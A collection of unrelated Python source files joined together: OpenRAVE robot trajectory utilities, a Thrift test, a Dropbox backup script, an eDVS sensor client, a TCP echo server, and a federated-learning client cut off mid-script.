This will step along the trajectory from start to end
at a resolution that satisifies the specified error metric.
@param openravepy.Robot robot: The robot.
@param openravepy.Trajectory traj: The trajectory for which we need
to generate sample points.
@param int norm_order: 1 ==> The L1 norm
2 ==> The L2 norm
inf ==> The L_infinity norm
@param generator sampling_func A function that returns a sequence of
sample times.
e.g. SampleTimeGenerator()
or
VanDerCorputSampleGenerator()
@returns generator: A tuple (t,q) of float values, being the sample
time and joint configuration.
"""
traj_cspec = traj.GetConfigurationSpecification()
# Make sure trajectory is linear in joint space
try:
# OpenRAVE trajectory type can be 'linear', 'quadratic', or
# other values including 'cubic', 'quadric' or 'quintic'
interp_type = traj_cspec.GetGroupFromName('joint_values').interpolation
except openravepy.openrave_exception:
raise ValueError('Trajectory does not have a joint_values group')
if interp_type != 'linear':
raise ValueError('Trajectory must be linear in joint space')
dof_indices, _ = traj_cspec.ExtractUsedIndices(robot)
# If trajectory only has 1 waypoint then we only need to
# do 1 collision check.
num_waypoints = traj.GetNumWaypoints()
if num_waypoints == 1:
t = 0.0
waypoint = traj.GetWaypoint(0)
q = traj_cspec.ExtractJointValues(waypoint, robot, dof_indices)
yield t, q
return
env = robot.GetEnv()
# Get the resolution (in radians) for each joint
q_resolutions = robot.GetDOFResolutions()[dof_indices]
# Create a list such that element i contains the number of collision
# checks to check the trajectory from the start up to waypoint i
checks = [0.0] * num_waypoints
# If traj is timed, we want to return meaningful t values, keep track
# of trajectory durations up to each waypoint to make this easier
traj_timed = IsTimedTrajectory(traj)
durations = [0.0] * num_waypoints
# Get the first waypoint to initialize the iteration
waypoint = traj.GetWaypoint(0)
q0 = traj_cspec.ExtractJointValues(waypoint, robot, dof_indices)
# Iterate over each segment in the trajectory and set
# the timing of each waypoint in the temporary trajectory
# so that taking steps of t=1 will be within a required error norm.
for i in range(1, num_waypoints):
# We already have the first waypoint (q0) of this segment,
# so get the joint values for the second waypoint.
waypoint = traj.GetWaypoint(i)
q1 = traj_cspec.ExtractJointValues(waypoint, robot, dof_indices)
dq = numpy.abs(q1 - q0)
# Get the number of steps (as a float) required for
# each joint at DOF resolution
num_steps = dq / q_resolutions
# Calculate the norm:
#
# norm_order = 1 ==> The L1 norm
# Which is like a diamond shape in configuration space
# and equivalent to: L1_norm=sum(num_steps)
#
# norm_order = 2 ==> The L2 norm
# Which is like an ellipse in configuration space
# and equivalent to: L2_norm=numpy.linalg.norm(num_steps)
#
# norm_order = inf ==> The L_infinity norm
# Which is like a box shape in configuration space
# and equivalent to: L_inf_norm=numpy.max(num_steps)
norm = numpy.linalg.norm(num_steps, ord=norm_order)
# Set timing of this waypoint
checks[i] = checks[i-1] + norm
if traj_timed:
durations[i] = durations[i-1] + traj_cspec.ExtractDeltaTime(waypoint)
# The last waypoint becomes the first in the next segment
q0 = q1
required_checks = checks[-1]
# Sample the trajectory using the specified sample generator
seq = None
if sampling_func is None:
# (default) Linear sequence, from start to end
seq = SampleTimeGenerator(0, required_checks, step=1, include_enpoints=True)
else:
seq = sampling_func(0, required_checks, step=1, include_endpoints=True)
# Sample a check and return the associated time in the original
# trajectory and joint position
checks = numpy.array(checks)
for c in seq:
# Convert the check number into a time in the original trajectory
sidx = numpy.searchsorted(checks, c)
t = None
if sidx == 0:
q = traj_cspec.ExtractJointValues(traj.GetWaypoint(0), robot, dof_indices)
else:
# Find the correct linear interpolation time
p = (c - checks[sidx-1]) / (checks[sidx] - checks[sidx-1])
# Interpolate
spt = traj_cspec.ExtractJointValues(traj.GetWaypoint(sidx-1), robot, dof_indices)
ept = traj_cspec.ExtractJointValues(traj.GetWaypoint(sidx), robot, dof_indices)
q = spt + p*(ept - spt)
if traj_timed:
stime = durations[sidx-1]
etime = durations[sidx]
t = stime + p*(etime - stime)
yield t, q
def IsInCollision(traj, robot, selfcoll_only=False):
report = openravepy.CollisionReport()
# Get trajectory length.
NN = traj.GetNumWaypoints()
ii = 0
total_dist = 0.0
for ii in range(NN - 1):
point1 = traj.GetWaypoint(ii)
point2 = traj.GetWaypoint(ii + 1)
dist = 0.0
total_dof = robot.GetActiveDOF()
for jj in range(total_dof):
dist += pow(point1[jj] - point2[jj], 2)
total_dist += numpy.sqrt(dist)
step_dist = 0.04
if traj.GetDuration() < 0.001:
openravepy.planningutils.RetimeActiveDOFTrajectory(traj, robot)
total_time = traj.GetDuration()
step_time = total_time * step_dist / total_dist
for t in numpy.arange(0.0, total_time, step_time):
point = traj.Sample(t)
collision = False
with robot.GetEnv():
robot.SetActiveDOFValues(point)
if robot.CheckSelfCollision(report):
collision = True
if not collision:
if ((not selfcoll_only) and
robot.GetEnv().CheckCollision(robot, report)):
collision = True
if collision:
return True
return False
OPENRAVE_JOINT_DERIVATIVES = {
0: "joint_values",
1: "joint_velocities",
2: "joint_accelerations",
3: "joint_jerks",
4: "joint_snaps",
5: "joint_crackles",
6: "joint_pops"
}
def GetJointDerivativeGroup(cspec, derivative):
"""
Helper function to extract a joint derivative group from a trajectory.
We use a manual mapping of joint derivatives to string values because the
OpenRAVE source code internally hard codes these constants anyway:
https://github.com/rdiankov/openrave/blob/master/src/libopenrave/configurationspecification.cpp#L983
@param cspec a trajectory configurationspecification
@param derivative the desired joint position derivative
(e.g. 0 = positions, 1 = velocities, ...)
@return a ConfigurationSpecification Group for the derivative
or None if it does not exist in the specification.
"""
try:
return cspec.GetGroupFromName(OPENRAVE_JOINT_DERIVATIVES[derivative])
except KeyError:
return None
except openravepy.openrave_exception:
return None
def JointStatesFromTraj(robot, traj, times, derivatives=[0, 1, 2]):
"""
Helper function to extract the joint position, velocity and acceleration
from an OpenRAVE trajectory.
@param robot The OpenRAVE robot
@param traj An OpenRAVE trajectory
@param times List of times in seconds
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
if not IsTimedTrajectory(traj):
raise ValueError("Joint states can only be interpolated"
" on a timed trajectory.")
duration = traj.GetDuration()
times = numpy.array(times)
if any(times > duration):
raise ValueError('Input times {0:} exceed duration {1:.2f}'
.format(times, duration))
cspec = traj.GetConfigurationSpecification()
num_dofs = robot.GetDOF()
dof_indices = range(num_dofs)
pva_list = []
for t in times:
pva = [None] * len(derivatives)
trajdata = traj.Sample(t)
for i, deriv in enumerate(derivatives):
pva[i] = cspec.ExtractJointValues(trajdata, robot,
dof_indices, deriv)
pva_list.append(pva)
return pva_list
def JointStateFromTraj(robot, traj, time, derivatives=[0, 1, 2]):
"""
Helper function to extract the joint position, velocity and acceleration
from an OpenRAVE trajectory.
@param robot The OpenRAVE robot
@param traj An OpenRAVE trajectory
@param time time in seconds
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
return JointStatesFromTraj(robot, traj, (time,), derivatives)[0]
def BodyPointsStatesFromJointStates(bodypoints,
jointstates,
derivatives=[0, 1, 2]):
"""
Computes the derivatives body points given jointstates.
Currently only supports derivatives up to 2.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param jointstates List of list of joint derivatives.
Unavailable fields are input as 'None'
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
# Convert derivatives to numpy array
derivatives = numpy.array(derivatives)
maxd = max(derivatives)
numd = len(derivatives)
if any(derivatives > 2):
raise ValueError("Can only support derivatives up to 2.")
# Assume everything belongs to the same robot and env
robot = bodypoints[0][0].manipulator.GetRobot()
env = robot.GetEnv()
bpstate_list = []
with env:
with robot:
for js in jointstates:
# Make all unavailable and undesired derivatives None
q, qd, qdd = [js[x] if x < len(js) and x <= maxd
else None for x in range(3)]
if q is not None:
robot.SetDOFValues(q)
else:
bpstate_list.append([[[None] * numd] * len(bodypoints)])
continue
for bp in bodypoints:
bp_state = [None] * numd
link, local_pos = bp
link_index = link.GetIndex()
link_transform = link.GetTransform()
world_pos = (numpy.dot(link_transform[0:3, 0:3],
local_pos) +
link_transform[0:3, 3])
bp_state[0] = world_pos
if qd is not None:
Jpos = robot.CalculateJacobian(link_index, world_pos)
Jang = robot.CalculateAngularVelocityJacobian(
link_index)
vpos = numpy.dot(Jpos, qd)
vang = numpy.dot(Jang, qd)
bp_state[1] = numpy.hstack((vpos, vang))
else:
continue
if qdd is not None:
Hpos = robot.ComputeHessianTranslation(
link_index, world_pos)
Hang = robot.ComputeHessianAxisAngle(link_index)
apos = (numpy.dot(Jpos, qdd) +
numpy.dot(qd, numpy.dot(Hpos, qd)))
aang = (numpy.dot(Jang, qdd) +
numpy.dot(qd, numpy.dot(Hang, qd)))
bp_state[2] = numpy.hstack((apos, aang))
bpstate_list.append(bp_state)
return bpstate_list
def BodyPointsStatesFromJointState(bodypoints, jointstate,
derivatives=[0, 1, 2]):
"""
Computes the pos, vel, acc of body points given the
pos, vel, acc of jointstates.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param jointstate List of joint position,
velocity and acceleration.
Unavailable fields are input as 'None'
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
return BodyPointsStatesFromJointStates(bodypoints, (jointstate,),
derivatives)[0]
def BodyPointsStatesFromTraj(bodypoints, traj, times, derivatives=[0, 1, 2]):
"""
Computes the pos, vel, acc of body points from a joint space trajectory
at specified times.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param traj An OpenRAVE trajectory
@param time List of times in seconds
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
# Assume everything belongs to the same robot
robot = bodypoints[0][0].manipulator.GetRobot()
jointstates = JointStatesFromTraj(robot, traj, times,
range(max(derivatives)))
return BodyPointsStatesFromJointStates(bodypoints, jointstates,
derivatives)
def BodyPointsStateFromTraj(bodypoints, traj, time, derivatives=[0, 1, 2]):
"""
Computes the pos, vel, acc of body points from a joint space trajectory
at a specified time.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param traj An OpenRAVE trajectory
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
return BodyPointsStatesFromTraj(bodypoints, traj, (time,), derivatives)[0]
def wrap_to_interval(angles, lower=-numpy.pi):
"""
Wraps an angle into a semi-closed interval of width 2*pi.
By default, this interval is `[-pi, pi)`. However, the lower bound of the
interval can be specified to wrap to the interval `[lower, lower + 2*pi)`.
If `lower` is an array the same length as angles, the bounds will be
applied element-wise to each angle in `angles`.
See: http://stackoverflow.com/a/32266181
@param angles an angle or 1D array of angles to wrap
@type angles float or numpy.array
@param lower optional lower bound on wrapping interval
@type lower float or numpy.array
"""
return (angles - lower) % (2 * numpy.pi) + lower
def GetManipulatorIndex(robot, manip=None):
"""
Takes a robot and returns the active manipulator and its index.
@param robot The OpenRAVE robot
@param manip The robot manipulator
@return (manip, manip_idx) The manipulator and its index
"""
from openravepy import DebugLevel, RaveGetDebugLevel, RaveSetDebugLevel
with robot.GetEnv():
if manip is None:
manip = robot.GetActiveManipulator()
with robot.CreateRobotStateSaver(
robot.SaveParameters.ActiveManipulator):
robot.SetActiveManipulator(manip)
# Ignore GetActiveManipulatorIndex's DeprecationWarning.
debug_level = RaveGetDebugLevel()
try:
RaveSetDebugLevel(DebugLevel.Error)
manip_idx = manip.GetRobot().GetActiveManipulatorIndex()
finally:
RaveSetDebugLevel(debug_level)
return (manip, manip_idx)
def GetPointFrom(focus):
"""
Given a kinbody, array or transform, returns the xyz location.
@param focus The area to be referred to
"""
# Pointing at a kinbody
if isinstance(focus, openravepy.KinBody):
with focus.GetEnv():
focus_trans = focus.GetTransform()
coord = list(focus_trans[0:3, 3])
# Pointing at a kinbody link
elif isinstance(focus, openravepy.KinBody.Link):
with focus.GetParent().GetEnv():
focus_trans = focus.GetTransform()
coord = list(focus_trans[0:3, 3])
# Pointing at a point in space as numpy array
elif (isinstance(focus, numpy.ndarray) and
(focus.ndim == 1) and (len(focus) == 3)):
coord = list(focus)
# Pointing at point in space as 4x4 transform
elif isinstance(focus, numpy.ndarray) and (focus.shape == (4, 4)):
coord = list(focus[0:3, 3])
# Pointing at a point in space as list or tuple
elif (isinstance(focus, (tuple, list)) and len(focus) == 3):
coord = focus
else:
raise ValueError('Focus of the point is an unknown object')
return coord
|
test_tutorial_client.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import sys
sys.path.append(os.path.abspath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "../")
))
from jsonthrift.jsonthrift import JsonThrift
import socket
import unittest
import multiprocessing
import time
from thrift_tutorial.server import CalculatorHandler
transport = 'TBufferedTransport'
protocol = 'TBinaryProtocol'
thrift_file = 'thrift_tutorial/tutorial.thrift'
service = 'Calculator'
def compare(a, b):
if type(a) != type(b):
return False
if isinstance(a, dict):
for k, v in a.iteritems():
if k not in b:
return False
return compare(v, b[k])
elif isinstance(a, list):
if len(a) != len(b):
return False
for i in xrange(len(a)):
return compare(a[i], b[i])
else:
return a == b
def start_server():
sys.path.append('thrift_tutorial/gen-py')
from tutorial import Calculator
from tutorial.ttypes import InvalidOperation, Operation
from shared.ttypes import SharedStruct
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
handler = CalculatorHandler()
processor = Calculator.Processor(handler)
transport = TSocket.TServerSocket(port=9090)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
server.serve()
class RemoteCallTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.p = multiprocessing.Process(target=start_server)
cls.p.start()
time.sleep(1)
addr = socket.getaddrinfo(
"localhost", 9090, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE | socket.AI_ADDRCONFIG)
cls.socket = socket.socket(addr[0][0], addr[0][1])
try:
cls.socket.connect(addr[0][4])
except Exception, e:
print "To run these tests, you have to start tutorial server first!"
raise e
@classmethod
def tearDownClass(cls):
cls.socket.close()
cls.p.terminate()
@classmethod
def remote_call(cls, msg):
cls.socket.send(msg)
return cls.socket.recv(1024)
def test_add(self):
method = 'add'
params = {"num1": 1, "num2": 3}
expect = {"success": 4}
jt = JsonThrift(transport, protocol, thrift_file, service)
msg = jt.pack_request(method, params, 1)
result = jt.unpack_response(self.remote_call(msg))[4]
self.assertTrue(compare(result, expect))
def test_calculate_normal(self):
method = 'calculate'
params = {"logid": 1, "w": { "op": 1, "num1": 1, "num2": 0 } }
expect = {'success': 1}
jt = JsonThrift(transport, protocol, thrift_file, service)
msg = jt.pack_request(method, params, 1)
result = jt.unpack_response(self.remote_call(msg))[4]
self.assertTrue(compare(result, expect))
def test_calculate_exception(self):
method = 'calculate'
params = {"logid": 1, "w":{"op": 4, "num1": 1, "num2": 0}}
expect = {'ouch': {'whatOp': 4, 'why': 'Cannot divide by 0'}}
jt = JsonThrift(transport, protocol, thrift_file, service)
msg = jt.pack_request(method, params, 1)
result = jt.unpack_response(self.remote_call(msg))[4]
self.assertTrue(compare(result, expect))
if __name__ == '__main__':
unittest.main()
|
dbak.py
|
#!/usr/bin/env python3
import configparser
import logging
import os
import sys
import dropbox
from dropbox.exceptions import ApiError, AuthError, BadInputError
from dropbox.files import WriteMode
logging.basicConfig(format='dbak %(asctime)s %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %I:%M:%S')
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
DBX = False
BACKUP_PATHS = []
def validate_config():
config = configparser.ConfigParser()
config.read('config.ini')
# check dropbox connection
try:
access_token = config['DEFAULT']['ACCESS_TOKEN']
dbx = dropbox.Dropbox(access_token)
account = dbx.users_get_current_account()
_logger.info('Dropbox authenticate successfully as {0}'.
format(account.name.display_name))
global DBX
DBX = dbx
except KeyError as e:
_logger.error(
'Missing or wrong config format in ./config.ini {}'.format(e))
return False
except (AuthError, BadInputError) as e:
_logger.error('Dropbox authenticate failed {}'.format(e))
return False
# check backup paths
try:
backup_paths = config['DEFAULT']['BACKUP_PATHS']
backup_paths = backup_paths.split()
if not backup_paths:
_logger.warning('No file paths to backup.')
return False
path_not_exists = []
expand_backup_paths = []
for path in backup_paths:
expand_path = os.path.expanduser(path)
expand_backup_paths.append(expand_path)
if not os.path.exists(expand_path):
path_not_exists.append(path)
if path_not_exists:
_logger.error('These paths are not exists: {}'.
format(', '.join(path_not_exists)))
return False
global BACKUP_PATHS
BACKUP_PATHS = expand_backup_paths
except KeyError:
_logger.error('Missing or wrong config format in ./config.ini')
return False
return True
def get_recursive_files(path):
if os.path.isfile(path):
return [path]
paths = []
for path, subdirs, files in os.walk(path):
for name in files:
paths.append(os.path.join(path, name))
return paths
def upload_file(path):
with open(path, 'rb') as f:
try:
_logger.info('Uploading {} ...'.format(path))
DBX.files_upload(f.read(), path, mode=WriteMode('overwrite'))
except ApiError as e:
_logger.error('Error occurred: {}'.format(e))
def delete_file(path):
try:
_logger.info('Remove {} ...'.format(path))
DBX.files_delete(path)
except ApiError as e:
_logger.error('Error occurred: {}'.format(e))
def backup(BACKUP_PATHS):
upload_files = []
for path in BACKUP_PATHS:
for p in get_recursive_files(path):
# # threading seems not work
# thread = threading.Thread(target=upload_file, args=[p])
# thread.daemon = True
# thread.start()
upload_file(p)
upload_files.append(p)
remove_files = []
for entry in DBX.files_list_folder(path='', recursive=True).entries:
if isinstance(entry, dropbox.files.FileMetadata) and \
entry.path_display not in upload_files:
remove_files.append(entry.path_display)
if remove_files:
for p in remove_files:
# thread = threading.Thread(target=delete_file, args=[p])
# thread.daemon = True
# thread.start()
delete_file(p)
return True
if __name__ == '__main__':
if not validate_config():
sys.exit(1)
backup(BACKUP_PATHS)
|
edvs.py
|
import numpy as np
import threading
import atexit
import time
class Serial(object):
def __init__(self, port, baud):
import serial
self.conn = serial.Serial(port, baudrate=baud, rtscts=True, timeout=0)
def send(self, message):
self.conn.write(message.encode('utf-8'))
def receive(self):
return self.conn.read(1024)
def close(self):
self.conn.close()
import socket
class Socket(object):
cache = {}
def __init__(self, address, port=56000):
self.socket = Socket.get_socket(address, port)
@classmethod
def get_socket(cls, address, port):
key = (address, port)
s = cls.cache.get(key, None)
if s is None:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address, port))
s.settimeout(0)
cls.cache[key] = s
return s
def send(self, message):
self.socket.send(message.encode())
def receive(self):
try:
return self.socket.recv(1024)
except socket.error:
return b''
def close(self):
self.socket.close()
class EDVS:
def __init__(self):
self.connection = None
self.retina_packet_size = None
self.image = None
self.record_file = None
def connect(self, connection):
self.connection = connection
self.last_time = {}
self.connection.send('\n')
self.retina(False)
atexit.register(self.disconnect)
thread = threading.Thread(target=self.sensor_loop)
thread.daemon = True
thread.start()
def disconnect(self):
self.retina(False)
if self.record_file is not None:
self.record_file.close()
self.connection.close()
def retina(self, active, bytes_in_timestamp=4):
if active:
assert bytes_in_timestamp in [0, 2, 3, 4]
cmd = '!E%d\nE+\n' % bytes_in_timestamp
self.retina_packet_size = 2 + bytes_in_timestamp
else:
cmd = 'E-\n'
self.retina_packet_size = None
self.connection.send(cmd)
def show_image(self, decay=0.5, display_mode='quick'):
if self.image is None:
self.image = np.zeros((128, 128), dtype=float)
thread = threading.Thread(target=self.image_loop,
args=(decay, display_mode))
thread.daemon = True
thread.start()
def image_loop(self, decay, display_mode):
import pylab
import matplotlib.pyplot as plt
# using axis for updating only parts of the image that change
fig, ax = plt.subplots()
# so quick mode can run on ubuntu
plt.show(block=False)
pylab.ion()
img = pylab.imshow(self.image, vmax=1, vmin=-1,
interpolation='none', cmap='binary')
pylab.xlim(0, 127)
pylab.ylim(127, 0)
while True:
img.set_data(self.image)
if display_mode == 'quick':
# this is faster, but doesn't work on all systems
fig.canvas.draw()
fig.canvas.flush_events()
elif display_mode == 'ubuntu_quick':
# this is even faster, but doesn't work on all systems
ax.draw_artist(ax.patch)
ax.draw_artist(img)
ax.draw_artist(scatter)
fig.canvas.update()
fig.canvas.flush_events()
else:
# this works on all systems, but is kinda slow
pylab.pause(1e-8)
self.image *= decay
def sensor_loop(self):
"""Handle all data coming from the robot."""
old_data = None
buffered_ascii = b''
while True:
packet_size = self.retina_packet_size
# grab the new data
data = self.connection.receive()
if len(data) > 0:
print(len(data))
# combine it with any leftover data from last time through the loop
if old_data is not None:
data = old_data + data
old_data = None
if packet_size is None:
# no retina events, so everything should be ascii
buffered_ascii += data
else:
# find the ascii events
data_all = np.frombuffer(data, np.uint8)
ascii_index = np.where(data_all[::packet_size] < 0x80)[0]
offset = 0
while len(ascii_index) > 0:
# if there's an ascii event, remove it from the data
index = ascii_index[0]*packet_size
stop_index = np.where(data_all[index:] >=0x80)[0]
if len(stop_index) > 0:
stop_index = index + stop_index[0]
else:
stop_index = len(data)
# and add it to the buffered_ascii list
buffered_ascii += data[offset+index:offset+stop_index]
data_all = np.hstack((data_all[:index],
data_all[stop_index:]))
offset += stop_index - index
ascii_index = np.where(data_all[::packet_size] < 0x80)[0]
# handle any partial retina packets
extra = len(data_all) % packet_size
if extra != 0:
old_data = data[-extra:]
data_all = data_all[:-extra]
if len(data_all) > 0:
# now process those retina events
self.process_retina(data_all)
# and process the ascii events too
while b'\n' in buffered_ascii:
cmd, buffered_ascii = buffered_ascii.split(b'\n', 1)
self.process_ascii(cmd)
def process_ascii(self, message):
message = message.decode('utf-8')
print(message)
last_timestamp = None
def process_retina(self, data):
packet_size = self.retina_packet_size
y = data[::packet_size] & 0x7f
x = data[1::packet_size] & 0x7f
if self.record_file is not None:
self.record_file.write(data)
if self.image is not None:
value = np.where(data[1::packet_size]>=0x80, 1, -1)
np.add.at(self.image, (y, x), value)
def record_retina_data(self, filename):
self.record_file = open(filename, 'wb')
if __name__ == '__main__':
edvs = EDVS()
edvs.connect(Socket('99.250.220.231', port=9105))
#edvs.connect(Serial('COM6', baud=4000000))
time.sleep(1)
edvs.retina(True)
edvs.show_image(display_mode='quick', decay=0.2)
while True:
time.sleep(0.01)
|
work_TCP_server.py
|
# import socket
#
# s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# s.connect(('www.sina.com.cn', 80))
#
# s.send(b'GET / HTTP/1.1\r\nHost: www.sina.com.cn\r\nConnection: close\r\n\r\n')
#
# buffer = []
# while True:
# d=s.recv(1024)
# if d:
# buffer.append(d)
# else:
# break
#
# data=b''.join(buffer)
#
# s.close()
#
# header, html = data.split(b'\r\n\r\n',1)
# print(header.decode('utf-8'))
#
# with open('sina.html','wb') as f:
# f.write(html)
import socket,threading,time
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 9999))
s.listen(5)
print('Waiting for connection...')
while True:
# 接受一个新连接:
sock, addr = s.accept()
# 创建新线程来处理TCP连接:
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
|
run_client.py
|
import os
import sys
import argparse
import torch
import grpc
import psutil
import numpy as np
import syft as sy
from syft.workers import websocket_server
from torchvision import transforms
import threading
import time
import logging
# Add data folder to path
pwd = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'data')
sys.path.append(pwd)
# Add common folder to path
pwd = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'common')
sys.path.append(pwd)
# Add summary folder to path
pwd = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'common', 'summary')
sys.path.append(pwd)
from utilities import Utility as util
import devicetocentral_pb2
import devicetocentral_pb2_grpc
from hist import HistSummary, HistMatSummary
devid = ""
DP_EPSILON = 0.1
# register device with central server and get device id
def register_to_central(args):
with grpc.insecure_channel(args.centralip + ':50051') as channel:
stub = devicetocentral_pb2_grpc.DeviceToCentralStub(channel)
logging.info('Registering to central server: ' + args.centralip + ':50051')
resp = stub.RegisterToCentral(
devicetocentral_pb2.DeviceInfo (
ip = args.host,
flport = args.port
)
)
logging.info('Registration complete')
if resp.success :
logging.info(args.host + ':' + str(args.port) + ' registered with id ' + resp.id + '...')
global devid
devid = resp.id
return True
return False
# send device profile every 5 seconds to the central server
def heartbeat(args, once):
while(True):
if not once:
time.sleep(5)
load = psutil.os.getloadavg()
virt_mem = psutil.virtual_memory()
battery = psutil.sensors_battery()
percent = 0.0
if battery == None:
percent = 0.0
with grpc.insecure_channel(args.centralip + ':50051') as channel:
stub = devicetocentral_pb2_grpc.DeviceToCentralStub(channel)
#logging.info('Heat beat to server...')
resp = stub.HeartBeat(
devicetocentral_pb2.Ping (
cpu_usage = psutil.cpu_percent(),
ncpus = psutil.cpu_count(),
load15 = load[2],
virtual_mem = virt_mem.available/(1024*1024*1024),
battery = percent,
id = devid
)
)
if resp.ack :
pass
else:
logging.info('Connection to server failed...')
return
if once:
break
def send_summary(args, datacls):
global DP_EPSILON
tensor_train_x, tensor_train_y = datacls.get_training_data(devid)
train_y = tensor_train_y.numpy()
summaryType = args.summary.lower()
summaryPayload = ""
if summaryType == "py" or summaryType == "rnd" or summaryType == "tifl" or summaryType == "oort":
histInput = list(map(str, train_y.tolist()))
histSummary = HistSummary(histInput)
histSummary.addNoise(DP_EPSILON)
summaryPayload = histSummary.toJson()
elif summaryType == "pxy":
train_x = tensor_train_x.numpy()
histInput = {}
histMatInput = {}
labelSpace = list(map(str, np.unique(train_y)))
for label in labelSpace:
histInput[label] = []
if args.dataset.upper() == "CIFAR10":
for yIdx in range(len(train_y)):
label = str(train_y[yIdx])
xarr = train_x[yIdx,:].flatten()
counts, xLabels = np.histogram(xarr, bins=20, range=(0,1))
sd = []
for xIdx, numericLabel in enumerate(xLabels[:-1]):
count = counts[xIdx]
xLab = "b" + str(numericLabel)
sd = sd + count*[xLab]
histInput[label] += sd
else:
for idx in range(len(train_y)):
label = str(train_y[idx])
xarr = train_x[idx,:].flatten()
sd = list(map(str, xarr))
histInput[label] += sd
for label in labelSpace:
hip = histInput[label]
histMatInput[label] = HistSummary(hip)
histSummary = HistMatSummary(histMatInput)
histSummary.addNoise(DP_EPSILON)
summaryPayload = histSummary.toJson()
else:
print("Summary " + args.summary + " not implemented")
return False
with grpc.insecure_channel(args.centralip + ':50051') as channel:
stub = devicetocentral_pb2_grpc.DeviceToCentralStub(channel)
logging.info('Sending summary to central server: ' + args.centralip + ':50051')
resp = stub.SendSummary(
devicetocentral_pb2.DeviceSummary (
id = devid,
type = summaryType,
summary = summaryPayload,
)
)
logging.info('Summary sending complete')
if resp.ack :
logging.info(args.host + ':' + str(args.port) + ' sent summary')
return True
return False
def start_websocker_server_worker(id, host, port, dataset, datacls, hook, verbose):
server = websocket_server.WebsocketServerWorker(
id = id,
host = '0.0.0.0',
port = port,
hook = hook,
verbose = verbose)
# Training data
train_data, train_targets = datacls.get_training_data(id)
dataset_train = sy.BaseDataset(
data = train_data,
targets = train_targets,
transform = transforms.Compose([transforms.ToTensor()])
)
server.add_dataset(dataset_train, key = dataset + '_TRAIN')
# Testing data
test_data, test_targets = datacls.get_testing_data(id)
dataset_test = sy.BaseDataset(
data = test_data,
targets = test_targets,
transform = transforms.Compose([transforms.ToTensor()])
)
server.add_dataset(dataset_test, key = dataset + '_TEST')
server.start()
return server
def parse_arguments(args = sys.argv[1:]):
parser = argparse.ArgumentParser(description='Run websocket server worker')
parser.add_argument(
'--port',
default = util.get_free_port(),
type=int,
help='port number on which websocket server will listen: --port 8777',
)
parser.add_argument(
'--host',
type=str,
default='localhost',
help='host on which the websocket server worker should be run: --host 1.2.3.4',
)
parser.add_argument(
'--id',
type=str,
default='alice',
help='name of the websocket server worker: --id alice'
)
parser.add_argument(
'--dataset',
'-ds',
type=str,
default='MNIST',
help='dataset used for the model: --dataset CIFAR10'
)
parser.add_argument(
'--summary',
'-s',
type=str,
default='tifl',
help='data summary to send: --summary py'
)
parser.add_argument(
'--centralip',
'-cip',
type=str,
default='localhost',
help = 'central server ip address: --centralip 1.2.3.4'
)
parser.add_argument(
'--verbose',
'-v',
action='store_true',
help='start websocket server worker in verbose mode: --verbose'
)
args = parser.parse_args(args = args)
return args
if __name__ == '__main__':
#Parse arguments
args = parse_arguments()
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S')
# grpc call to central server to register
stat = register_to_central(args)
if not stat:
print('Registration to central failed...')
sys.exit()
# set dataset class
from datasetFactory import DatasetFactory as dftry
datacls = dftry.getDataset(args.dataset)
# Training/Testing data
datacls.download_data()
_, _ = datacls.get_training_data(devid)
_, _ = datacls.get_testing_data(devid)
heartbeat(args, True)
# grpc call to send summary to central server
